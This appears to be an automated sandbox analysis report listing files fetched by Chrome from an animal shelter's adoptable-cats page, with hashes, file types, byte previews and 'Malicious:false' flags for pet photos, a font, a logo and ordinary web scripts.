                                                                                                                                                                                                                                                        Preview:wOF2..............*....~.................................J?HVAR.".`?STAT.\'2.../l.....,.A....0..4.6.$..8. .....8..[..Q#.....m..A......N.2Y......6.....e..iIe.m.KZ......=...,.....-+..6"..s.j..23.+.Y.vY....YX'.w^N..@...-mu....!...9.i....DS.=....>.a.t.Q,\t..G.2!.....[../S........D..A&.8...!.A.7K+2Q.c....D..._..i....*..J(f=7...C.[..n6.B....B.t.z4C.T+...b...!.B..x..*r>D....q.C......9.Z....?....{./.......D#..N..O]+..5.5.......{".l.XD...,."a.l0bD..FcD].W..^.qzQ.^.uMA...>h.0.K=.4..h.....T..mG.+.........n+_DG..I.GT..B..igd.X.!u.n&U.;.C.~S.........d....h..{.... .. ..KL...!N.$..5.a.SN......6.=}j.HJ:J.pG.n.~b.AOS..'.T....G.........E.]..O\...|.p/...l..-.i4?....J*0..y.........N.O....3.4&ql...t.T.......I..q..$..........i.n..m..O...v....P.m!...........K...M....r.6Q......:E..$.D>.it...h..>B...R..~.NmF.....x{1`.c..[brR..T....%..\.wz.^..V...?..YG^...eok....b.uu.V.ZqP`.04,.^..L.K.l....i......%Vj..'.0...o..g.....w7z..i`8R.Cj........V.HV.;..w.Qg......pY...b.3$
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):57711
                                                                                                                                                                                                                                                        Entropy (8bit):7.975682214638221
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:wP+ZnS32yZYo3ZezU98eBLGxJTPyD3+SsG:1+2ooUGgLGxRPyCSsG
                                                                                                                                                                                                                                                        MD5:A09290B4394B5FCC414DA5525CC90C87
                                                                                                                                                                                                                                                        SHA1:919C6D1A419C2FAB26AC4D0F6A5C95E0AEE45F19
                                                                                                                                                                                                                                                        SHA-256:312B0C1D9D39915AEC3C7486FCBC4E2AF22FE3B2941984496237D511DBEA09C3
                                                                                                                                                                                                                                                        SHA-512:2A9FF42CDE6685B79F2D0CB332D63E1F4C2D7F1A8A47C625E1172DC79AD90C93E5CA8B95A427CC4E0EC3794680B5CF4FAE6572E6938EF41B6776F4B9C47DCBE8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/fe090341-f359-4d15-a7d0-260c04791544.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.w....~....z...c....?..`}.....4.......jS..q\...!....s.).u&&..)6..>.G.f..G0r......N..5...~.)~......t....:U........I..z|..t....R.M..k....(.`...\.J....i...<...{....9...)..h....R..H.c........u.>p..=...M4.....`..w....`..o#..............f{..+...!>..*..3...^.S..>`..5..4...X.k...`....3...=.a..1.8_.j9...\.?x...z.Q.."....).q:..:).y.....(.`..s...p..7..X.l....k.....n..h.J.1.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone XR, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:19 15:28:03, hostcomputer=iPhone XR, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):40056
                                                                                                                                                                                                                                                        Entropy (8bit):7.867727963650312
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:E93N+OUDrihq7DKO0VIvtpy3RA8DhkUpMYib4QRfjxmBF3MNkGMfyV7G8:037UDrCquI1una4Qxe3MJEr8
                                                                                                                                                                                                                                                        MD5:E84D4F2CA65B56EC801BB002FB9EFA57
                                                                                                                                                                                                                                                        SHA1:D1AB484F47FB049FE062EFD67A3B0A5D56D8A702
                                                                                                                                                                                                                                                        SHA-256:5D2CEC8B320362BEABF90B33E61101E52C008B66E498A57D717A76BD84658F05
                                                                                                                                                                                                                                                        SHA-512:FCFA4AC9AD3269DCE11FDC277396019020341DBE1588BF4FCB7AEAF3FDB40F80F014F66E89A80E114C93605FF0FAC74F82BAE28FC952BEDB70156D0D57667E83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/5e3cc503-736f-4a0b-899b-1bef3d36f827.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone XR.H.......H.......18.1.1.2024:12:19 15:28:03.iPhone XR.H.......H......."."...........'.......@...........0232............................................456.........456.........0100....................................................................................................................................2...........3...........4...#...................................................+...........?...........G...........O...........W..........._...........g...|...-...o.......-05:00.-05:00.-05:00.................................Apple.iPhone XR back camera 4.25mm f/1.8.....(...........2024:12:19 15:28:03.2024:12:19 15:28:03..m......'...E~...l..rs........................2.Apple iOS...MM.*...............................h...........................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone XR, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:19 15:28:03, hostcomputer=iPhone XR, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40056
                                                                                                                                                                                                                                                        Entropy (8bit):7.867727963650312
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:E93N+OUDrihq7DKO0VIvtpy3RA8DhkUpMYib4QRfjxmBF3MNkGMfyV7G8:037UDrCquI1una4Qxe3MJEr8
                                                                                                                                                                                                                                                        MD5:E84D4F2CA65B56EC801BB002FB9EFA57
                                                                                                                                                                                                                                                        SHA1:D1AB484F47FB049FE062EFD67A3B0A5D56D8A702
                                                                                                                                                                                                                                                        SHA-256:5D2CEC8B320362BEABF90B33E61101E52C008B66E498A57D717A76BD84658F05
                                                                                                                                                                                                                                                        SHA-512:FCFA4AC9AD3269DCE11FDC277396019020341DBE1588BF4FCB7AEAF3FDB40F80F014F66E89A80E114C93605FF0FAC74F82BAE28FC952BEDB70156D0D57667E83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone XR.H.......H.......18.1.1.2024:12:19 15:28:03.iPhone XR.H.......H......."."...........'.......@...........0232............................................456.........456.........0100....................................................................................................................................2...........3...........4...#...................................................+...........?...........G...........O...........W..........._...........g...|...-...o.......-05:00.-05:00.-05:00.................................Apple.iPhone XR back camera 4.25mm f/1.8.....(...........2024:12:19 15:28:03.2024:12:19 15:28:03..m......'...E~...l..rs........................2.Apple iOS...MM.*...............................h...........................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):39467
                                                                                                                                                                                                                                                        Entropy (8bit):7.976059977575099
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9vyFv5+PxrpOKh4yK0JVshLAmEzUqNX+W/jhx70ukn+QWa:9KKBpHwhLARBX+W/jXXZa
                                                                                                                                                                                                                                                        MD5:9779D2EA901768D1B4205C90DBE3ED01
                                                                                                                                                                                                                                                        SHA1:762303B1A2E7AF1CFE4E6FB75079A8B399E30B52
                                                                                                                                                                                                                                                        SHA-256:8B83A452F9085F5750EC0BD4197AC32FD38BF183727341A788D7F7B7D35FDA6A
                                                                                                                                                                                                                                                        SHA-512:558EC2A8A4AE6207E1624514D07888633F27E919B2DF6F41AEA7F4E3013D06C826FCBEA6469A64068C71D11C84588FA79E7B2E400C68035EC42D06A7BEB8E8DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.g.xDZ..^.c....A...|W...`..4..:.%...v..1...Un.s.i#.$...p.HH9.V.@<..@..*3@x<.ERC..9...Sp<..T.Q.....a..9...`x..NHo..]..*.J....4.[.......AV,..v.4....s..[v^..=j.I.......H.m.....,.....\*..5,..`.{P..&:n<V...9.F1X...lU.e-.3.C,...?.z'....t..7d..x....<-.%....e?..|K...cZ..p.q....a.M..t...^....WwL.."M...v^..E....a...G..5.rAM...+.B.X....*M&bu9.M..NM #..........D.nV..Fk&..r.=..>.5
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone XR, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:19 14:53:21, hostcomputer=iPhone XR, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):37144
                                                                                                                                                                                                                                                        Entropy (8bit):7.858027232516446
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EE3Q9Srm7apO/ailpfFrpP7RIPObo0WKtKp3vITbi2O6TsOMz:t3Q9/apAainftpP7e80fsbm6bMz
                                                                                                                                                                                                                                                        MD5:790A81BA371204AA3BAB1953F190D17D
                                                                                                                                                                                                                                                        SHA1:B73E69545CD5D2116250763798386B0F3BD24E6E
                                                                                                                                                                                                                                                        SHA-256:FB852F2FED904561413ACF0943A1D6E0F71A97083C705F14CC08C229B57FA339
                                                                                                                                                                                                                                                        SHA-512:680B07E96A9E479019C63E0C07B860111C21C2683D00B83F4DA4DB8F2951BF3F4B8E0CE190C74BE0994FCFF7DA62A372D4305F10ABBB8FD6391B0260B51751BC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone XR.H.......H.......18.1.1.2024:12:19 14:53:21.iPhone XR.H.......H......."."...........'.......@...........0232............................................099.........099.........0100....................................................................................................................................2...........3...........4...#...................................................+...........?...........G...........O...........W..........._...........g...|...-...o.......-05:00.-05:00.-05:00.................................Apple.iPhone XR back camera 4.25mm f/1.8.....(...........2024:12:19 14:53:21.2024:12:19 14:53:21..m......'...E~..dp..I.........................2.Apple iOS...MM.*...............................h...........................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x933, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):128812
                                                                                                                                                                                                                                                        Entropy (8bit):7.9803164211605155
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:hBTOjNlvUC0btEslZequtqjH34ScQhPTCFLc5geBNNqGTm:hUjNlneZlZelsX4AGezNw
                                                                                                                                                                                                                                                        MD5:43777C34086D41DEC67D023D75228A69
                                                                                                                                                                                                                                                        SHA1:C888C9FC2C0F5C4AAA6A8C4E07030B4DD8B40D89
                                                                                                                                                                                                                                                        SHA-256:44C6A41BDC39DEBE52E4D747DC203A5B52EA5DABAAC057373DC9649699853A77
                                                                                                                                                                                                                                                        SHA-512:FAD6FC6A7CE7CC4AC34BA7687EC102CBC230430E101831635DE003C75600A9B6B08817CECBE8B4487C9599643811D56E852C8716126122C9CCFB104F7BE2B1C8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....7...V.0........q7.#._.s^..W.K.6P.7..z..[....=..=ih.>.O.....3.h..+.RN.q........y.X... r@...I.=i...zW-.x. !.g...GS.d..]..u...l.q.@+.......'.p.fG.U...s+O.uMg...m. |......i>...0.O...I...I.!..I&..r....S.r.3R.(P.@..6.....61..h......d...1...IFb..3..^..Fp.V.c?....CR...Tu..+X.[...;...L.*...I........pyaE.X{..v......q....<...6.....%..@.4."+.......T.QW..f^.my.7..Q..j...\m9.=+.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5195), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5195
                                                                                                                                                                                                                                                        Entropy (8bit):5.944046612089431
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:1g2VilZtckx+9DgTlPJdiLW+iSah8vf1dtzlTaI0AEdGBg6XhP4hWzJWMW:12cV9sT3AW7NIzydXKdLI3
                                                                                                                                                                                                                                                        MD5:AF05F9BACBBA8EAE62FA727FE47C5572
                                                                                                                                                                                                                                                        SHA1:2F11C2C13CEF31446EA84119B9203D9E9F8EB53D
                                                                                                                                                                                                                                                        SHA-256:D11E8543035528CB7E5BE6F4706F2C889D207B2BEC8A08348D2FFA08E5E1714F
                                                                                                                                                                                                                                                        SHA-512:2BE4B8DA7A42A2761CFD30B2242A42D42B7F3CD02AAFD6A7C004F1FD2379DDBBE238C4D9C59CB17278B4DCED0E637338C9A01392993C65D7EEDA5B8FC4AFD3C4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googleadservices.com/pagead/conversion/1009911120/?random=1736387984394&cv=11&fst=1736387984394&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&bttype=purchase&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&rfmt=3&fmt=4
                                                                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(a,b,c){if(!c||a!=null){c=t[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} function v(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],g;!a&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;b=b(c);b!=null&&(a?h(q,d,{configurable:!0,writable:!0,value:b}):b!==c&&(t[d]===void 0&&(a=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+a+"$"+d),h(g,t[d],{co
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9141
                                                                                                                                                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                                                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                                                                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                                                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                                                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14 Pro, xresolution=202, yresolution=210, software=18.0.1, datetime=2024:11:16 13:46:27, hostcomputer=iPhone 14 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x652, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):110502
                                                                                                                                                                                                                                                        Entropy (8bit):7.946883693242955
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:E3vjyJSthajOa9KLoTFvk1807XnbUFmxudKhPm3:E3vjyJSTajODiWi07XnAaQKhO3
                                                                                                                                                                                                                                                        MD5:44C2CC1C41528A20888F73BD3BD74B91
                                                                                                                                                                                                                                                        SHA1:6B59841211791E15553D20C61746F82A803F1E8F
                                                                                                                                                                                                                                                        SHA-256:86F66C1BB77F117B8874E7F9268CD83DE91A8208789DF668244C7088C62D07CB
                                                                                                                                                                                                                                                        SHA-512:A04AE4B6964B8C5FB6134390379CD2EF12FCE7F1C2725AFB4691AC02BF106C738E6E9B717756EFE939DFB1A2D8F1A1A5CBC91FAA7BCDD11B639654004E15824C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 14 Pro.H.......H.......18.0.1.2024:11:16 13:46:27.iPhone 14 Pro.H.......H......."."...........'.......P...........0232............................................400.........400.........0100....................................................................................................................................2...........3...........4.../...........................#...........+...........?...........S...........[...........c...........k...........s...........{...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 14 Pro back triple camera 6.86mm f/1.78.....X...Y...2...2024:11:16 13:46:27.2024:11:16 13:46:27......................-..........W...2.........2.Apple iOS...MM.6...............................h.......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 768 x 161, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15508
                                                                                                                                                                                                                                                        Entropy (8bit):7.9290838631232745
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:cqx10Ky+lHWLENBjAJlAa8zM1dp9mrr00diG4fpi1pCHApc:XpWLQBMJGDC9Kr01rpiCAq
                                                                                                                                                                                                                                                        MD5:9E2027E296B9BB9D6E3597D2F1C1D1FF
                                                                                                                                                                                                                                                        SHA1:D7EAD5D222D7DDD81AF87A9B8BF6C00F5EA24B87
                                                                                                                                                                                                                                                        SHA-256:13C5C8DF3729ACADEC955B6A4B3E56A15C74E065DC2C11B000E7F5DAD79CF3E1
                                                                                                                                                                                                                                                        SHA-512:93D9A2BE38741614D5EB5D370BFB30DF6DF0930714337A8B9B970B002CB55147A50891D9EE24FFC2896EACA20235DD5741F364680E60F57404B9CE9921003107
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............p).X....pHYs..........+.... .IDATx.....\U....]..4M.&tb...31..b.F.d0..A.I.W.*.0.....<,..>..".(*:*.... "*".. ..Y....Io.vbo.m.i:..:..{.t..u......<O?D....[........RJ)..RJ)..RJ)..RJ)..RJ)..RJ).....p*...^.....7.9J)..RJE....8el/..ML..H..hts.RJ)..........X...1.4.IJ)..RJEM........Y.......m.RJ)..R.......m....M...a.el.lP..RJ).......,k..s...@...l..f)..RJ).5.....3..ME~..x..[tA.RJ)..R4C.`.k..E~.....:...RJ).T...MC..d.G-...8<#U.V)..RJ).Y....C..r....y....k.C..RJ)....x...}......*xF.cn....RJ)..t....L..{-...Yga.Ea5I)..RJ.8._.....\.\....{.8...#.RJ)..jR.......n....B<`%p....}.RJ)..RM!^.@z_.l.&...5...iY.eA.RJ)..t.....c.55.e...H....J)..RJ5.......{..5.)..Z.Y.YJ)..RJ.I|...E.......r...(..RJ).+...(+.....p'p..#O`.y..{..1.RJ)..........K..;.&1.F....W)..RJ..~.......;>............RJ).T$E?.0\.,...K.H.u|..RJ)."%..@z......_.....|k@g..RJ).T.n..i...@W.....Lb.,8VJ)..R.yE3.H.K`.E.....U.s9^.E.Q..RJ)."+....-..~j..+..nr...{=..RJ)../z.@z_.X....3/........RJ).T.E+.H
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:21:51, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):57174
                                                                                                                                                                                                                                                        Entropy (8bit):7.907314291203263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:63cWCEGMo763Z6KM5UJ2jV4Iwen9u1tuCuLsJN0zDvxkpwTJTO:638V7763wLS2x4DOwtuCu8NMDey1y
                                                                                                                                                                                                                                                        MD5:DE259DEB1DB3431BAA12DFD8CE1DB44D
                                                                                                                                                                                                                                                        SHA1:7FB457190A7C77B877AC7D5EAE180D0FBF10DAEF
                                                                                                                                                                                                                                                        SHA-256:6C5D850453B40B0C04C7046E05DC5E3C779886AA53251B780349D42ADBD7C807
                                                                                                                                                                                                                                                        SHA-512:EA2A9E24A87341AD9A54B90BC067C4C964953214E7C8CA7E53A39129BD1BB1F1F687BBC7A9194B3596E586F912A25A8EE33088EA90C52674C08BF00A374A5249
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:21:51.iPhone 15 Plus.H.......H......."."...........'...................0232............................................696.........696.........0100........D...........D...............................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:21:51.2024:12:19 19:21:51......%..o8...)...H..u...................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
